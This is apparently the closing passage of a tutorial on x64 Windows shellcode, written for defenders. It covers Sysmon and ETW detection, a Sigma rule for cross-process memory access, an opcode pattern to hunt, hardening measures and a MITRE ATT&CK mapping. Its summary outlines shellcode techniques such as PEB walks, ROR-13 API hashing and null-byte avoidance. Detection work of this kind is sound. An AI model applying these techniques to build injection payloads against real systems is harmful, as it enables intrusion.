| Reflective loading of a PE in memory | Shellcode bootstraps a full PE image without touching disk (T1620) |
11. Defensive Strategies & Detection
Shellcode is observable at multiple layers. The most reliable signals come from the behaviours the techniques above require, not from the byte patterns they happen to produce.
Sysmon events to enable and triage:
EventID 1— Process Create. Unusual parent/child chains (browser, Office, mail client spawningcmd.exe/powershell.exe) are the cheapest, highest-yield signal.EventID 8—CreateRemoteThread. Cross-process thread creation into LSASS, browsers, or signed Windows binaries is high-fidelity.EventID 10—ProcessAccess. WatchGrantedAccessmasks like0x1FFFFF(full access) and0x1010(read + VM-write).EventID 17/18— Pipe creation/connection, frequently used by shellcode-launched implants for C2.
ETW providers worth subscribing to in EDR pipelines:
Microsoft-Windows-Kernel-Process— kernel-side process/thread/image events.Microsoft-Windows-Threat-Intelligence(PPL-only) —NtAllocateVirtualMemory,NtProtectVirtualMemory,NtWriteVirtualMemory,NtCreateThreadExat the syscall layer, bypassed by no usermode hook.Microsoft-Windows-Security-Auditing— handle and object access.
Audit policies: Audit Process Creation (Success) and Audit Kernel Object surface the same events to the classic Security log for SIEM ingestion.
Behavioural signals defenders should hunt on:
- Threads with
StartAddressinMEM_PRIVATEregions that arePAGE_EXECUTE_*and not backed by a file image. CallTracecontainingUNKNOWNframes — the calling instruction lives in unbacked memory.gs:[0x60]opcode pattern (65 48 8B 04 25 60 00 00 00) inside executable regions of non-system modules.- ROR-13 hashing loops in memory scans.
Sigma sketch — suspicious cross-process access typical of shellcode injection:
title: Suspicious Cross-Process Access With VM-Write Rights
logsource:
product: windows
service: sysmon
detection:
selection:
EventID: 10
GrantedAccess:
- '0x1FFFFF'
- '0x1410'
- '0x1010'
filter_legit:
SourceImage|endswith:
- '\MsMpEng.exe'
- '\WmiPrvSE.exe'
condition: selection and not filter_legit
level: highHardening to deploy on monitored endpoints:
- Arbitrary Code Guard (ACG) — denies the
PAGE_EXECUTE_*transition that turns aMEM_PRIVATEshellcode buffer into runnable code. - Control Flow Guard (CFG) — invalidates indirect calls into unregistered targets, which shellcode entry points always are.
- Block Win32 API calls from Office macros / child processes — Attack Surface Reduction rule that severs the most common shellcode delivery vector.
- PPL-protected EDR with kernel ETW Ti subscription — preserves syscall-layer telemetry even when userland hooks are patched out.
A useful EDR tripwire is to permute the head of InMemoryOrderModuleList with stub entries: shellcode that walks two Flinks blindly resolves the decoy module, fails to find expected exports, and crashes — producing a high-fidelity detection.
12. Tools for x64 Shellcode Analysis
| Tool | Description | Link |
|---|---|---|
| NASM | Assembler for the snippets in this tutorial; emits raw binary for direct hex inspection | nasm.us |
| Keystone Engine | Programmatic assembler (Python bindings) for bad-character analysis labs | keystone-engine.org |
| x64dbg | User-mode debugger; trace shellcode through gs:[0x60] and EAT walks | x64dbg.com |
| WinDbg | Inspect _TEB, _PEB, _PEB_LDR_DATA, _LDR_DATA_TABLE_ENTRY on the target build | learn.microsoft.com |
| Ghidra / IDA | Static analysis of shellcode-bearing samples and reflective loader stubs | ghidra-sre.org |
| Volatility 3 | Memory forensics: enumerate suspicious MEM_PRIVATE + RX regions, hunt unbacked threads | volatilityfoundation.org |
| Process Hacker | Live triage of thread start addresses and memory protections | processhacker.sourceforge.io |
| Godbolt Compiler Explorer | Inspect MSVC-emitted x64 prologues to confirm ABI assumptions | godbolt.org |
13. MITRE ATT&CK Mapping
| Technique | MITRE ID | Detection |
|---|---|---|
| Process Injection (umbrella) | T1055 | Sysmon EventID 8 + EventID 10 with VM-write GrantedAccess |
| DLL Injection | T1055.001 | Image Load (EventID 7) from MEM_PRIVATE-allocated path |
| Portable Executable Injection | T1055.002 | Volatility scans for PE headers in MEM_PRIVATE RX regions |
| APC Injection | T1055.004 | ETW Ti NtQueueApcThread to remote thread; alerted thread-start addresses |
| Process Hollowing | T1055.012 | EventID 1 with suspended child, followed by EventID 10 write + resume |
| Native API | T1106 | ETW Ti syscall provider; direct Nt* calls outside ntdll |
| Obfuscated Files or Information | T1027 | YARA on ROR-13 loops; entropy heuristics on dropped payloads |
| Reflective Code Loading | T1620 | Unbacked RX memory with PE magic / no module image record |
Summary
- x64 Windows shellcode is governed by a strict ABI: argument registers
RCX/RDX/R8/R9, return inRAX, a 32-byte shadow space, and 16-byte stack alignment at everycall. - The TEB is reached via
gs:[0x60]on x64; every PEB offset (+0x18,+0x20,+0x30) differs from the x86 layout and must be verified against the target build. - Position-independent API resolution combines a PEB walk to
kernel32.dllwith an EAT walk using ROR-13 name hashing to avoid embedded strings. - Null-byte avoidance leans on 32-bit sub-register writes that zero-extend, RIP-relative
lea, and XOR-then-push idioms. - Detection is layered: Sysmon
EventID 8/10for injection chains, ETWThreat-Intelligencefor syscall-level memory writes, behavioural hunts for unbackedRXregions, and ACG/CFG/ASR hardening to deny the primitives shellcode depends on.
Related Tutorials
- Position-Independent Code: Writing PIC Shellcode Without Hardcoded Addresses
- Writing Your First Shellcode: x86 Reverse Shell from Scratch
- x86 and x64 Calling Conventions: cdecl, stdcall, fastcall, and System V
- Egghunters: Staged Payload Delivery When Buffer Space Is Tight
- Shellcode Encoders: XOR Encoding, Custom Decoders, and Avoiding Bad Chars
References
- x64 Calling Convention — Microsoft Learn (MSVC)
- x64 ABI Conventions (Software Conventions Overview) — Microsoft Learn
- x64 Architecture Overview and Register Reference — Microsoft Learn (Windows Drivers)
- x64 Stack Usage (Shadow Space / Home Space) — Microsoft Learn
- Process Injection, Technique T1055 — MITRE ATT&CK Enterprise
- Windows x64 Shellcode — Topher Timzen (Security Research)